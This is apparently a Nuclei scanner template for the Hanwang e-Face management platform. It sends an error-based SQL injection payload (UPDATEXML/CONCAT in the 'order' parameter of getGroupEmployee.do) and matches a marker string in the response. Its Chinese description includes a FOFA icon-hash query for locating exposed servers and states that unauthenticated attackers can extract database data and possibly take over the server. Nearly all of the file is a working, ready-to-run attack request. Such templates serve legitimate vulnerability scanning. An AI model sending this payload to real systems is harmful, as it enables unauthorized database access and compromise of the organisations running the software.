http:
    - matchers:
        - dsl:
            - status_code == 200 && contains (body,'qqjpq1qpkvq')
          name: SQL注入
          type: dsl
      raw:
        - |-
          GET /manage/authMultiplePeople/getGroupEmployee.do?recoToken=67mds2pxXQb&groupId=1&page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x2e,0x71716a7071,(SELECT+(ELT(2920=2920,1))),0x71706b7671),8357)) HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Connection: close
id: Hanwang-getGroupEmployee-sql
info:
    author: HuanXiong
    description: |-
        fofa: icon_hash="1380907357"
        汉王e脸通综合管理平台 getGroupEmployee.do 接口存在SQL注入漏洞，未经授权攻击者可通过该漏洞获取数据库敏感信息，进一步利用可获取服务器权限，导致网站处于极度不安全状态。
    name: 汉王e脸通综合管理平台 getGroupEmployee.do SQL注入
    reference:
        - null
    severity: high
    tags: []
